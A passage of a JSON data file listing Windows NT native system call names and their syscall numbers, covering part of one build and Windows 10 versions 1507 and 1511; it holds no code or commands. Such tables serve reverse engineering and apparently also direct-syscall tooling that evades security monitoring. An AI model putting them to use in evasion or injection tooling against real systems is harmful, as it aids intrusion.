"NtPowerInformation": 94, "NtSetValueKey": 95, "NtCancelTimer": 96, "NtSetTimer": 97, "NtAccessCheck": 98, "NtAccessCheckByType": 99, "NtAccessCheckByTypeResultList": 100, "NtAccessCheckByTypeResultListAndAuditAlarm": 101, "NtAccessCheckByTypeResultListAndAuditAlarmByHandle": 102, "NtAddAtomEx": 103, "NtAddBootEntry": 104, "NtAddDriverEntry": 105, "NtAdjustGroupsToken": 106, "NtAdjustTokenClaimsAndDeviceGroups": 107, "NtAlertResumeThread": 108, "NtAlertThread": 109, "NtAlertThreadByThreadId": 110, "NtAllocateLocallyUniqueId": 111, "NtAllocateReserveObject": 112, "NtAllocateUserPhysicalPages": 113, "NtAllocateUuids": 114, "NtAlpcAcceptConnectPort": 115, "NtAlpcCancelMessage": 116, "NtAlpcConnectPort": 117, "NtAlpcConnectPortEx": 118, "NtAlpcCreatePort": 119, "NtAlpcCreatePortSection": 120, "NtAlpcCreateResourceReserve": 121, "NtAlpcCreateSectionView": 122, "NtAlpcCreateSecurityContext": 123, "NtAlpcDeletePortSection": 124, "NtAlpcDeleteResourceReserve": 125, "NtAlpcDeleteSectionView": 126, "NtAlpcDeleteSecurityContext": 127, "NtAlpcDisconnectPort": 128, "NtAlpcImpersonateClientOfPort": 129, "NtAlpcOpenSenderProcess": 130, "NtAlpcOpenSenderThread": 131, "NtAlpcQueryInformation": 132, "NtAlpcQueryInformationMessage": 133, "NtAlpcRevokeSecurityContext": 134, "NtAlpcSendWaitReceivePort": 135, "NtAlpcSetInformation": 136, "NtAreMappedFilesTheSame": 137, "NtAssignProcessToJobObject": 138, "NtAssociateWaitCompletionPacket": 139, "NtCancelIoFileEx": 140, "NtCancelSynchronousIoFile": 141, "NtCancelTimer2": 142, "NtCancelWaitCompletionPacket": 143, "NtCommitComplete": 144, "NtCommitEnlistment": 145, "NtCommitTransaction": 146, "NtCompactKeys": 147, "NtCompareTokens": 148, "NtCompleteConnectPort": 149, "NtCompressKey": 150, "NtConnectPort": 151, "NtCreateDebugObject": 152, "NtCreateDirectoryObject": 153, "NtCreateDirectoryObjectEx": 154, "NtCreateEnlistment": 155, "NtCreateEventPair": 156, "NtCreateIRTimer": 157, "NtCreateIoCompletion": 158, "NtCreateJobObject": 159, "NtCreateJobSet": 160, "NtCreateKeyTransacted": 161, "NtCreateKeyedEvent": 162, "NtCreateLowBoxToken": 163, "NtCreateMailslotFile": 164, "NtCreateMutant": 165, "NtCreateNamedPipeFile": 166, "NtCreatePagingFile": 167, "NtCreatePort": 168, "NtCreatePrivateNamespace": 169, "NtCreateProcess": 170, "NtCreateProfile": 171, "NtCreateProfileEx": 172, "NtCreateResourceManager": 173, "NtCreateSemaphore": 174, "NtCreateSymbolicLinkObject": 175, "NtCreateThreadEx": 176, "NtCreateTimer": 177, "NtCreateTimer2": 178, "NtCreateToken": 179, "NtCreateTokenEx": 180, "NtCreateTransaction": 181, "NtCreateTransactionManager": 182, "NtCreateUserProcess": 183, "NtCreateWaitCompletionPacket": 184, "NtCreateWaitablePort": 185, "NtCreateWnfStateName": 186, "NtCreateWorkerFactory": 187, "NtDebugActiveProcess": 188, "NtDebugContinue": 189, "NtDeleteAtom": 190, "NtDeleteBootEntry": 191, "NtDeleteDriverEntry": 192, "NtDeleteFile": 193, "NtDeleteKey": 194, "NtDeleteObjectAuditAlarm": 195, "NtDeletePrivateNamespace": 196, "NtDeleteValueKey": 197, "NtDeleteWnfStateData": 198, "NtDeleteWnfStateName": 199, "NtDisableLastKnownGood": 200, "NtDisplayString": 201, "NtDrawText": 202, "NtEnableLastKnownGood": 203, "NtEnumerateBootEntries": 204, "NtEnumerateDriverEntries": 205, "NtEnumerateSystemEnvironmentValuesEx": 206, "NtEnumerateTransactionObject": 207, "NtExtendSection": 208, "NtFilterBootOption": 209, "NtFilterToken": 210, "NtFilterTokenEx": 211, "NtFlushBuffersFileEx": 212, "NtFlushInstallUILanguage": 213, "NtFlushInstructionCache": 214, "NtFlushKey": 215, "NtFlushProcessWriteBuffers": 216, "NtFlushVirtualMemory": 217, "NtFlushWriteBuffer": 218, "NtFreeUserPhysicalPages": 219, "NtFreezeRegistry": 220, "NtFreezeTransactions": 221, "NtGetCachedSigningLevel": 222, "NtGetCompleteWnfStateSubscription": 223, "NtGetContextThread": 224, "NtGetCurrentProcessorNumber": 225, "NtGetDevicePowerState": 226, "NtGetMUIRegistryInfo": 227, "NtGetNextProcess": 228, "NtGetNextThread": 229, "NtGetNlsSectionPtr": 230, "NtGetNotificationResourceManager": 231, "NtGetWriteWatch": 232, "NtImpersonateAnonymousToken": 233, "NtImpersonateThread": 234, "NtInitializeNlsFiles": 235, "NtInitializeRegistry": 236, "NtInitiatePowerAction": 237, "NtIsSystemResumeAutomatic": 238, "NtIsUILanguageComitted": 239, "NtListenPort": 240, "NtLoadDriver": 241, "NtLoadKey": 242, "NtLoadKey2": 243, "NtLoadKeyEx": 244, "NtLockFile": 245, "NtLockProductActivationKeys": 246, "NtLockRegistryKey": 247, "NtLockVirtualMemory": 248, "NtMakePermanentObject": 249, "NtMakeTemporaryObject": 250, "NtMapCMFModule": 251, "NtMapUserPhysicalPages": 252, "NtModifyBootEntry": 253, "NtModifyDriverEntry": 254, "NtNotifyChangeDirectoryFile": 255, "NtNotifyChangeKey": 256, "NtNotifyChangeMultipleKeys": 257, "NtNotifyChangeSession": 258, "NtOpenEnlistment": 259, "NtOpenEventPair": 260, "NtOpenIoCompletion": 261, "NtOpenJobObject": 262, "NtOpenKeyEx": 263, "NtOpenKeyTransacted": 264, "NtOpenKeyTransactedEx": 265, "NtOpenKeyedEvent": 266, "NtOpenMutant": 267, "NtOpenObjectAuditAlarm": 268, "NtOpenPrivateNamespace": 269, "NtOpenProcessToken": 270, "NtOpenResourceManager": 271, "NtOpenSemaphore": 272, "NtOpenSession": 273, "NtOpenSymbolicLinkObject": 274, "NtOpenThread": 275, "NtOpenTimer": 276, "NtOpenTransaction": 277, "NtOpenTransactionManager": 278, "NtPlugPlayControl": 279, "NtPrePrepareComplete": 280, "NtPrePrepareEnlistment": 281, "NtPrepareComplete": 282, "NtPrepareEnlistment": 283, "NtPrivilegeCheck": 284, "NtPrivilegeObjectAuditAlarm": 285, "NtPrivilegedServiceAuditAlarm": 286, "NtPropagationComplete": 287, "NtPropagationFailed": 288, "NtPulseEvent": 289, "NtQueryBootEntryOrder": 290, "NtQueryBootOptions": 291, "NtQueryDebugFilterState": 292, "NtQueryDirectoryObject": 293, "NtQueryDriverEntryOrder": 294, "NtQueryEaFile": 295, "NtQueryFullAttributesFile": 296, "NtQueryInformationAtom": 297, "NtQueryInformationEnlistment": 298, "NtQueryInformationJobObject": 299, "NtQueryInformationPort": 300, "NtQueryInformationResourceManager": 301, "NtQueryInformationTransaction": 302, "NtQueryInformationTransactionManager": 303, "NtQueryInformationWorkerFactory": 304, "NtQueryInstallUILanguage": 305, "NtQueryIntervalProfile": 306, "NtQueryIoCompletion": 307, "NtQueryLicenseValue": 308, "NtQueryMultipleValueKey": 309, "NtQueryMutant": 310, "NtQueryOpenSubKeys": 311, "NtQueryOpenSubKeysEx": 312, "NtQueryPortInformationProcess": 313, "NtQueryQuotaInformationFile": 314, "NtQuerySecurityAttributesToken": 315, "NtQuerySecurityObject": 316, "NtQuerySemaphore": 317, "NtQuerySymbolicLinkObject": 318, "NtQuerySystemEnvironmentValue": 319, "NtQuerySystemEnvironmentValueEx": 320, "NtQuerySystemInformationEx": 321, "NtQueryTimerResolution": 322, "NtQueryWnfStateData": 323, "NtQueryWnfStateNameInformation": 324, "NtQueueApcThreadEx": 325, "NtRaiseException": 326, "NtRaiseHardError": 327, "NtReadOnlyEnlistment": 328, "NtRecoverEnlistment": 329, "NtRecoverResourceManager": 330, "NtRecoverTransactionManager": 331, "NtRegisterProtocolAddressInformation": 332, "NtRegisterThreadTerminatePort": 333, "NtReleaseKeyedEvent": 334, "NtReleaseWorkerFactoryWorker": 335, "NtRemoveIoCompletionEx": 336, "NtRemoveProcessDebug": 337, "NtRenameKey": 338, "NtRenameTransactionManager": 339, "NtReplaceKey": 340, "NtReplacePartitionUnit": 341, "NtReplyWaitReplyPort": 342, "NtRequestPort": 343, "NtResetEvent": 344, "NtResetWriteWatch": 345, "NtRestoreKey": 346, "NtResumeProcess": 347, "NtRollbackComplete": 348, "NtRollbackEnlistment": 349, "NtRollbackTransaction": 350, "NtRollforwardTransactionManager": 351, "NtSaveKey": 352, "NtSaveKeyEx": 353, "NtSaveMergedKeys": 354, "NtSecureConnectPort": 355, "NtSerializeBoot": 356, "NtSetBootEntryOrder": 357, "NtSetBootOptions": 358, "NtSetCachedSigningLevel": 359, "NtSetContextThread": 360, "NtSetDebugFilterState": 361, "NtSetDefaultHardErrorPort": 362, "NtSetDefaultLocale": 363, "NtSetDefaultUILanguage": 364, "NtSetDriverEntryOrder": 365, "NtSetEaFile": 366, "NtSetHighEventPair": 367, "NtSetHighWaitLowEventPair": 368, "NtSetIRTimer": 369, "NtSetInformationDebugObject": 370, "NtSetInformationEnlistment": 371, "NtSetInformationJobObject": 372, "NtSetInformationKey": 373, "NtSetInformationResourceManager": 374, "NtSetInformationToken": 375, "NtSetInformationTransaction": 376, "NtSetInformationTransactionManager": 377, "NtSetInformationVirtualMemory": 378, "NtSetInformationWorkerFactory": 379, "NtSetIntervalProfile": 380, "NtSetIoCompletion": 381, "NtSetIoCompletionEx": 382, "NtSetLdtEntries": 383, "NtSetLowEventPair": 384, "NtSetLowWaitHighEventPair": 385, "NtSetQuotaInformationFile": 386, "NtSetSecurityObject": 387, "NtSetSystemEnvironmentValue": 388, "NtSetSystemEnvironmentValueEx": 389, "NtSetSystemInformation": 390, "NtSetSystemPowerState": 391, "NtSetSystemTime": 392, "NtSetThreadExecutionState": 393, "NtSetTimer2": 394, "NtSetTimerEx": 395, "NtSetTimerResolution": 396, "NtSetUuidSeed": 397, "NtSetVolumeInformationFile": 398, "NtSetWnfProcessNotificationEvent": 399, "NtShutdownSystem": 400, "NtShutdownWorkerFactory": 401, "NtSignalAndWaitForSingleObject": 402, "NtSinglePhaseReject": 403, "NtStartProfile": 404, "NtStopProfile": 405, "NtSubscribeWnfStateChange": 406, "NtSuspendProcess": 407, "NtSuspendThread": 408, "NtSystemDebugControl": 409, "NtTerminateJobObject": 410, "NtTestAlert": 411, "NtThawRegistry": 412, "NtThawTransactions": 413, "NtTraceControl": 414, "NtTranslateFilePath": 415, "NtUmsThreadYield": 416, "NtUnloadDriver": 417, "NtUnloadKey": 418, "NtUnloadKey2": 419, "NtUnloadKeyEx": 420, "NtUnlockFile": 421, "NtUnlockVirtualMemory": 422, "NtUnmapViewOfSectionEx": 423, "NtUnsubscribeWnfStateChange": 424, "NtUpdateWnfStateData": 425, "NtVdmControl": 426, "NtWaitForAlertByThreadId": 427, "NtWaitForDebugEvent": 428, "NtWaitForKeyedEvent": 429, "NtWaitForWorkViaWorkerFactory": 430, "NtWaitHighEventPair": 431, "NtWaitLowEventPair": 432}}, "Windows 10": {"1507": {"NtAccessCheck": 0, "NtWorkerFactoryWorkerReady": 1, "NtAcceptConnectPort": 2, "NtMapUserPhysicalPagesScatter": 3, "NtWaitForSingleObject": 4, "NtCallbackReturn": 5, "NtReadFile": 6, "NtDeviceIoControlFile": 7, "NtWriteFile": 8, "NtRemoveIoCompletion": 9, "NtReleaseSemaphore": 10, "NtReplyWaitReceivePort": 11, "NtReplyPort": 12, "NtSetInformationThread": 13, "NtSetEvent": 14, "NtClose": 15, "NtQueryObject": 16, "NtQueryInformationFile": 17, "NtOpenKey": 18, "NtEnumerateValueKey": 19, "NtFindAtom": 20, "NtQueryDefaultLocale": 21, "NtQueryKey": 22, "NtQueryValueKey": 23, "NtAllocateVirtualMemory": 24, "NtQueryInformationProcess": 25, "NtWaitForMultipleObjects32": 26, "NtWriteFileGather": 27, "NtSetInformationProcess": 28, "NtCreateKey": 29, "NtFreeVirtualMemory": 30, "NtImpersonateClientOfPort": 31, "NtReleaseMutant": 32, "NtQueryInformationToken": 33, "NtRequestWaitReplyPort": 34, "NtQueryVirtualMemory": 35, "NtOpenThreadToken": 36, "NtQueryInformationThread": 37, "NtOpenProcess": 38, "NtSetInformationFile": 39, "NtMapViewOfSection": 40, "NtAccessCheckAndAuditAlarm": 41, "NtUnmapViewOfSection": 42, "NtReplyWaitReceivePortEx": 43, "NtTerminateProcess": 44, "NtSetEventBoostPriority": 45, "NtReadFileScatter": 46, "NtOpenThreadTokenEx": 47, "NtOpenProcessTokenEx": 48, "NtQueryPerformanceCounter": 49, "NtEnumerateKey": 50, "NtOpenFile": 51, "NtDelayExecution": 52, "NtQueryDirectoryFile": 53, "NtQuerySystemInformation": 54, "NtOpenSection": 55, "NtQueryTimer": 56, "NtFsControlFile": 57, "NtWriteVirtualMemory": 58, "NtCloseObjectAuditAlarm": 59, "NtDuplicateObject": 60, "NtQueryAttributesFile": 61, "NtClearEvent": 62, "NtReadVirtualMemory": 63, "NtOpenEvent": 64, "NtAdjustPrivilegesToken": 65, "NtDuplicateToken": 66, "NtContinue": 67, "NtQueryDefaultUILanguage": 68, "NtQueueApcThread": 69, "NtYieldExecution": 70, "NtAddAtom": 71, "NtCreateEvent": 72, "NtQueryVolumeInformationFile": 73, "NtCreateSection": 74, "NtFlushBuffersFile": 75, "NtApphelpCacheControl": 76, "NtCreateProcessEx": 77, "NtCreateThread": 78, "NtIsProcessInJob": 79, "NtProtectVirtualMemory": 80, "NtQuerySection": 81, "NtResumeThread": 82, "NtTerminateThread": 83, "NtReadRequestData": 84, "NtCreateFile": 85, "NtQueryEvent": 86, "NtWriteRequestData": 87, "NtOpenDirectoryObject": 88, "NtAccessCheckByTypeAndAuditAlarm": 89, "NtQuerySystemTime": 90, "NtWaitForMultipleObjects": 91, "NtSetInformationObject": 92, "NtCancelIoFile": 93, "NtTraceEvent": 94, "NtPowerInformation": 95, "NtSetValueKey": 96, "NtCancelTimer": 97, "NtSetTimer": 98, "NtAccessCheckByType": 99, "NtAccessCheckByTypeResultList": 100, "NtAccessCheckByTypeResultListAndAuditAlarm": 101, "NtAccessCheckByTypeResultListAndAuditAlarmByHandle": 102, "NtAddAtomEx": 103, "NtAddBootEntry": 104, "NtAddDriverEntry": 105, "NtAdjustGroupsToken": 106, "NtAdjustTokenClaimsAndDeviceGroups": 107, "NtAlertResumeThread": 108, "NtAlertThread": 109, "NtAlertThreadByThreadId": 110, "NtAllocateLocallyUniqueId": 111, "NtAllocateReserveObject": 112, "NtAllocateUserPhysicalPages": 113, "NtAllocateUuids": 114, "NtAlpcAcceptConnectPort": 115, "NtAlpcCancelMessage": 116, "NtAlpcConnectPort": 117, "NtAlpcConnectPortEx": 118, "NtAlpcCreatePort": 119, "NtAlpcCreatePortSection": 120, "NtAlpcCreateResourceReserve": 121, "NtAlpcCreateSectionView": 122, "NtAlpcCreateSecurityContext": 123, "NtAlpcDeletePortSection": 124, "NtAlpcDeleteResourceReserve": 125, "NtAlpcDeleteSectionView": 126, "NtAlpcDeleteSecurityContext": 127, "NtAlpcDisconnectPort": 128, "NtAlpcImpersonateClientContainerOfPort": 129, "NtAlpcImpersonateClientOfPort": 130, "NtAlpcOpenSenderProcess": 131, "NtAlpcOpenSenderThread": 132, "NtAlpcQueryInformation": 133, "NtAlpcQueryInformationMessage": 134, "NtAlpcRevokeSecurityContext": 135, "NtAlpcSendWaitReceivePort": 136, "NtAlpcSetInformation": 137, "NtAreMappedFilesTheSame": 138, "NtAssignProcessToJobObject": 139, "NtAssociateWaitCompletionPacket": 140, "NtCancelIoFileEx": 141, "NtCancelSynchronousIoFile": 142, "NtCancelTimer2": 143, "NtCancelWaitCompletionPacket": 144, "NtCommitComplete": 145, "NtCommitEnlistment": 146, "NtCommitTransaction": 147, "NtCompactKeys": 148, "NtCompareObjects": 149, "NtCompareTokens": 150, "NtCompleteConnectPort": 151, "NtCompressKey": 152, "NtConnectPort": 153, "NtCreateDebugObject": 154, "NtCreateDirectoryObject": 155, "NtCreateDirectoryObjectEx": 156, "NtCreateEnlistment": 157, "NtCreateEventPair": 158, "NtCreateIRTimer": 159, "NtCreateIoCompletion": 160, "NtCreateJobObject": 161, "NtCreateJobSet": 162, "NtCreateKeyTransacted": 163, "NtCreateKeyedEvent": 164, "NtCreateLowBoxToken": 165, "NtCreateMailslotFile": 166, "NtCreateMutant": 167, "NtCreateNamedPipeFile": 168, "NtCreatePagingFile": 169, "NtCreatePartition": 170, "NtCreatePort": 171, "NtCreatePrivateNamespace": 172, "NtCreateProcess": 173, "NtCreateProfile": 174, "NtCreateProfileEx": 175, "NtCreateResourceManager": 176, "NtCreateSemaphore": 177, "NtCreateSymbolicLinkObject": 178, "NtCreateThreadEx": 179, "NtCreateTimer": 180, "NtCreateTimer2": 181, "NtCreateToken": 182, "NtCreateTokenEx": 183, "NtCreateTransaction": 184, "NtCreateTransactionManager": 185, "NtCreateUserProcess": 186, "NtCreateWaitCompletionPacket": 187, "NtCreateWaitablePort": 188, "NtCreateWnfStateName": 189, "NtCreateWorkerFactory": 190, "NtDebugActiveProcess": 191, "NtDebugContinue": 192, "NtDeleteAtom": 193, "NtDeleteBootEntry": 194, "NtDeleteDriverEntry": 195, "NtDeleteFile": 196, "NtDeleteKey": 197, "NtDeleteObjectAuditAlarm": 198, "NtDeletePrivateNamespace": 199, "NtDeleteValueKey": 200, "NtDeleteWnfStateData": 201, "NtDeleteWnfStateName": 202, "NtDisableLastKnownGood": 203, "NtDisplayString": 204, "NtDrawText": 205, "NtEnableLastKnownGood": 206, "NtEnumerateBootEntries": 207, "NtEnumerateDriverEntries": 208, "NtEnumerateSystemEnvironmentValuesEx": 209, "NtEnumerateTransactionObject": 210, "NtExtendSection": 211, "NtFilterBootOption": 212, "NtFilterToken": 213, "NtFilterTokenEx": 214, "NtFlushBuffersFileEx": 215, "NtFlushInstallUILanguage": 216, "NtFlushInstructionCache": 217, "NtFlushKey": 218, "NtFlushProcessWriteBuffers": 219, "NtFlushVirtualMemory": 220, "NtFlushWriteBuffer": 221, "NtFreeUserPhysicalPages": 222, "NtFreezeRegistry": 223, "NtFreezeTransactions": 224, "NtGetCachedSigningLevel": 225, "NtGetCompleteWnfStateSubscription": 226, "NtGetContextThread": 227, "NtGetCurrentProcessorNumber": 228, "NtGetCurrentProcessorNumberEx": 229, "NtGetDevicePowerState": 230, "NtGetMUIRegistryInfo": 231, "NtGetNextProcess": 232, "NtGetNextThread": 233, "NtGetNlsSectionPtr": 234, "NtGetNotificationResourceManager": 235, "NtGetWriteWatch": 236, "NtImpersonateAnonymousToken": 237, "NtImpersonateThread": 238, "NtInitializeNlsFiles": 239, "NtInitializeRegistry": 240, "NtInitiatePowerAction": 241, "NtIsSystemResumeAutomatic": 242, "NtIsUILanguageComitted": 243, "NtListenPort": 244, "NtLoadDriver": 245, "NtLoadKey": 246, "NtLoadKey2": 247, "NtLoadKeyEx": 248, "NtLockFile": 249, "NtLockProductActivationKeys": 250, "NtLockRegistryKey": 251, "NtLockVirtualMemory": 252, "NtMakePermanentObject": 253, "NtMakeTemporaryObject": 254, "NtManagePartition": 255, "NtMapCMFModule": 256, "NtMapUserPhysicalPages": 257, "NtModifyBootEntry": 258, "NtModifyDriverEntry": 259, "NtNotifyChangeDirectoryFile": 260, "NtNotifyChangeKey": 261, "NtNotifyChangeMultipleKeys": 262, "NtNotifyChangeSession": 263, "NtOpenEnlistment": 264, "NtOpenEventPair": 265, "NtOpenIoCompletion": 266, "NtOpenJobObject": 267, "NtOpenKeyEx": 268, "NtOpenKeyTransacted": 269, "NtOpenKeyTransactedEx": 270, "NtOpenKeyedEvent": 271, "NtOpenMutant": 272, "NtOpenObjectAuditAlarm": 273, "NtOpenPartition": 274, "NtOpenPrivateNamespace": 275, "NtOpenProcessToken": 276, "NtOpenResourceManager": 277, "NtOpenSemaphore": 278, "NtOpenSession": 279, "NtOpenSymbolicLinkObject": 280, "NtOpenThread": 281, "NtOpenTimer": 282, "NtOpenTransaction": 283, "NtOpenTransactionManager": 284, "NtPlugPlayControl": 285, "NtPrePrepareComplete": 286, "NtPrePrepareEnlistment": 287, "NtPrepareComplete": 288, "NtPrepareEnlistment": 289, "NtPrivilegeCheck": 290, "NtPrivilegeObjectAuditAlarm": 291, "NtPrivilegedServiceAuditAlarm": 292, "NtPropagationComplete": 293, "NtPropagationFailed": 294, "NtPulseEvent": 295, "NtQueryBootEntryOrder": 296, "NtQueryBootOptions": 297, "NtQueryDebugFilterState": 298, "NtQueryDirectoryObject": 299, "NtQueryDriverEntryOrder": 300, "NtQueryEaFile": 301, "NtQueryFullAttributesFile": 302, "NtQueryInformationAtom": 303, "NtQueryInformationEnlistment": 304, "NtQueryInformationJobObject": 305, "NtQueryInformationPort": 306, "NtQueryInformationResourceManager": 307, "NtQueryInformationTransaction": 308, "NtQueryInformationTransactionManager": 309, "NtQueryInformationWorkerFactory": 310, "NtQueryInstallUILanguage": 311, "NtQueryIntervalProfile": 312, "NtQueryIoCompletion": 313, "NtQueryLicenseValue": 314, "NtQueryMultipleValueKey": 315, "NtQueryMutant": 316, "NtQueryOpenSubKeys": 317, "NtQueryOpenSubKeysEx": 318, "NtQueryPortInformationProcess": 319, "NtQueryQuotaInformationFile": 320, "NtQuerySecurityAttributesToken": 321, "NtQuerySecurityObject": 322, "NtQuerySemaphore": 323, "NtQuerySymbolicLinkObject": 324, "NtQuerySystemEnvironmentValue": 325, "NtQuerySystemEnvironmentValueEx": 326, "NtQuerySystemInformationEx": 327, "NtQueryTimerResolution": 328, "NtQueryWnfStateData": 329, "NtQueryWnfStateNameInformation": 330, "NtQueueApcThreadEx": 331, "NtRaiseException": 332, "NtRaiseHardError": 333, "NtReadOnlyEnlistment": 334, "NtRecoverEnlistment": 335, "NtRecoverResourceManager": 336, "NtRecoverTransactionManager": 337, "NtRegisterProtocolAddressInformation": 338, "NtRegisterThreadTerminatePort": 339, "NtReleaseKeyedEvent": 340, "NtReleaseWorkerFactoryWorker": 341, "NtRemoveIoCompletionEx": 342, "NtRemoveProcessDebug": 343, "NtRenameKey": 344, "NtRenameTransactionManager": 345, "NtReplaceKey": 346, "NtReplacePartitionUnit": 347, "NtReplyWaitReplyPort": 348, "NtRequestPort": 349, "NtResetEvent": 350, "NtResetWriteWatch": 351, "NtRestoreKey": 352, "NtResumeProcess": 353, "NtRevertContainerImpersonation": 354, "NtRollbackComplete": 355, "NtRollbackEnlistment": 356, "NtRollbackTransaction": 357, "NtRollforwardTransactionManager": 358, "NtSaveKey": 359, "NtSaveKeyEx": 360, "NtSaveMergedKeys": 361, "NtSecureConnectPort": 362, "NtSerializeBoot": 363, "NtSetBootEntryOrder": 364, "NtSetBootOptions": 365, "NtSetCachedSigningLevel": 366, "NtSetContextThread": 367, "NtSetDebugFilterState": 368, "NtSetDefaultHardErrorPort": 369, "NtSetDefaultLocale": 370, "NtSetDefaultUILanguage": 371, "NtSetDriverEntryOrder": 372, "NtSetEaFile": 373, "NtSetHighEventPair": 374, "NtSetHighWaitLowEventPair": 375, "NtSetIRTimer": 376, "NtSetInformationDebugObject": 377, "NtSetInformationEnlistment": 378, "NtSetInformationJobObject": 379, "NtSetInformationKey": 380, "NtSetInformationResourceManager": 381, "NtSetInformationSymbolicLink": 382, "NtSetInformationToken": 383, "NtSetInformationTransaction": 384, "NtSetInformationTransactionManager": 385, "NtSetInformationVirtualMemory": 386, "NtSetInformationWorkerFactory": 387, "NtSetIntervalProfile": 388, "NtSetIoCompletion": 389, "NtSetIoCompletionEx": 390, "NtSetLdtEntries": 391, "NtSetLowEventPair": 392, "NtSetLowWaitHighEventPair": 393, "NtSetQuotaInformationFile": 394, "NtSetSecurityObject": 395, "NtSetSystemEnvironmentValue": 396, "NtSetSystemEnvironmentValueEx": 397, "NtSetSystemInformation": 398, "NtSetSystemPowerState": 399, "NtSetSystemTime": 400, "NtSetThreadExecutionState": 401, "NtSetTimer2": 402, "NtSetTimerEx": 403, "NtSetTimerResolution": 404, "NtSetUuidSeed": 405, "NtSetVolumeInformationFile": 406, "NtSetWnfProcessNotificationEvent": 407, "NtShutdownSystem": 408, "NtShutdownWorkerFactory": 409, "NtSignalAndWaitForSingleObject": 410, "NtSinglePhaseReject": 411, "NtStartProfile": 412, "NtStopProfile": 413, "NtSubscribeWnfStateChange": 414, "NtSuspendProcess": 415, "NtSuspendThread": 416, "NtSystemDebugControl": 417, "NtTerminateJobObject": 418, "NtTestAlert": 419, "NtThawRegistry": 420, "NtThawTransactions": 421, "NtTraceControl": 422, "NtTranslateFilePath": 423, "NtUmsThreadYield": 424, "NtUnloadDriver": 425, "NtUnloadKey": 426, "NtUnloadKey2": 427, "NtUnloadKeyEx": 428, "NtUnlockFile": 429, "NtUnlockVirtualMemory": 430, "NtUnmapViewOfSectionEx": 431, "NtUnsubscribeWnfStateChange": 432, "NtUpdateWnfStateData": 433, "NtVdmControl": 434, "NtWaitForAlertByThreadId": 435, "NtWaitForDebugEvent": 436, "NtWaitForKeyedEvent": 437, "NtWaitForWorkViaWorkerFactory": 438, "NtWaitHighEventPair": 439, "NtWaitLowEventPair": 440}, "1511": {"NtAccessCheck": 0, "NtWorkerFactoryWorkerReady": 1, "NtAcceptConnectPort": 2, "NtMapUserPhysicalPagesScatter": 3, "NtWaitForSingleObject": 4, "NtCallbackReturn": 5, "NtReadFile": 6, "NtDeviceIoControlFile": 7, "NtWriteFile": 8, "NtRemoveIoCompletion": 9, "NtReleaseSemaphore": 10, "NtReplyWaitReceivePort": 11, "NtReplyPort": 12, "NtSetInformationThread": 13, "NtSetEvent": 14, "NtClose": 15, "NtQueryObject": 16, "NtQueryInformationFile": 17, "NtOpenKey": 18, "NtEnumerateValueKey": 19, "NtFindAtom": 20, "NtQueryDefaultLocale": 21, "NtQueryKey": 22, "NtQueryValueKey": 23, "NtAllocateVirtualMemory": 24, "NtQueryInformationProcess": 25, "NtWaitForMultipleObjects32": 26, "NtWriteFileGather": 27, "NtSetInformationProcess": 28, "NtCreateKey": 29, "NtFreeVirtualMemory": 30, "NtImpersonateClientOfPort": 31, "NtReleaseMutant": 32, "NtQueryInformationToken": 33, "NtRequestWaitReplyPort": 34, "NtQueryVirtualMemory": 35, "NtOpenThreadToken": 36, "NtQueryInformationThread": 37, "NtOpenProcess": 38, "NtSetInformationFile": 39, "NtMapViewOfSection": 40, "NtAccessCheckAndAuditAlarm": 41, "NtUnmapViewOfSection": 42, "NtReplyWaitReceivePortEx": 43, "NtTerminateProcess": 44, "NtSetEventBoostPriority": 45, "NtReadFileScatter": 46, "NtOpenThreadTokenEx": 47, "NtOpenProcessTokenEx": 48, "NtQueryPerformanceCounter": 49, "NtEnumerateKey": 50, "NtOpenFile": 51, "NtDelayExecution": 52, "NtQueryDirectoryFile": 53, "NtQuerySystemInformation": 54, "NtOpenSection": 55, "NtQueryTimer": 56, "NtFsControlFile": 57, "NtWriteVirtualMemory": 58, "NtCloseObjectAuditAlarm": 59, "NtDuplicateObject": 60, "NtQueryAttributesFile": 61, "NtClearEvent": 62, "NtReadVirtualMemory": 63, "NtOpenEvent": 64, "NtAdjustPrivilegesToken": 65, "NtDuplicateToken": 66, "NtContinue": 67, "NtQueryDefaultUILanguage": 68, "NtQueueApcThread": 69, "NtYieldExecution": 70, "NtAddAtom": 71, "NtCreateEvent": 72, "NtQueryVolumeInformationFile": 73, "NtCreateSection": 74, "NtFlushBuffersFile": 75, "NtApphelpCacheControl": 76, "NtCreateProcessEx": 77, "NtCreateThread": 78, "NtIsProcessInJob": 79, "NtProtectVirtualMemory": 80, "NtQuerySection": 81, "NtResumeThread": 82, "NtTerminateThread": 83, "NtReadRequestData": 84, "NtCreateFile": 85, "NtQueryEvent": 86, "NtWriteRequestData": 87, "NtOpenDirectoryObject": 88, "NtAccessCheckByTypeAndAuditAlarm": 89, "NtQuerySystemTime": 90, "NtWaitForMultipleObjects": 91, "NtSetInformationObject": 92, "NtCancelIoFile": 93, "NtTraceEvent": 94, "NtPowerInformation": 95, "NtSetValueKey": 96, "NtCancelTimer": 97, "NtSetTimer": 98, "NtAccessCheckByType": 99, "NtAccessCheckByTypeResultList": 100, "NtAccessCheckByTypeResultListAndAuditAlarm": 101, "NtAccessCheckByTypeResultListAndAuditAlarmByHandle": 102, "NtAddAtomEx": 103, "NtAddBootEntry": 104, "NtAddDriverEntry": 105, "NtAdjustGroupsToken": 106, "NtAdjustTokenClaimsAndDeviceGroups": 107, "NtAlertResumeThread": 108, "NtAlertThread": 109, "NtAlertThreadByThreadId": 110, "NtAllocateLocallyUniqueId": 111, "NtAllocateReserveObject": 112, "NtAllocateUserPhysicalPages": 113, "NtAllocateUuids": 114, "NtAlpcAcceptConnectPort": 115, "NtAlpcCancelMessage": 116, "NtAlpcConnectPort": 117, "NtAlpcConnectPortEx": 118, "NtAlpcCreatePort": 119, "NtAlpcCreatePortSection": 120, "NtAlpcCreateResourceReserve": 121, "NtAlpcCreateSectionView": 122, "NtAlpcCreateSecurityContext": 123, "NtAlpcDeletePortSection": 124, "NtAlpcDeleteResourceReserve": 125, "NtAlpcDeleteSectionView": 126, "NtAlpcDeleteSecurityContext": 127, "NtAlpcDisconnectPort": 128, "NtAlpcImpersonateClientContainerOfPort": 129, "NtAlpcImpersonateClientOfPort": 130, "NtAlpcOpenSenderProcess": 131, "NtAlpcOpenSenderThread": 132, "NtAlpcQueryInformation": 133, "NtAlpcQueryInformationMessage": 134, "NtAlpcRevokeSecurityContext": 135, "NtAlpcSendWaitReceivePort": 136, "NtAlpcSetInformation": 137, "NtAreMappedFilesTheSame": 138, "NtAssignProcessToJobObject": 139, "NtAssociateWaitCompletionPacket": 140, "NtCancelIoFileEx": 141, "NtCancelSynchronousIoFile": 142, 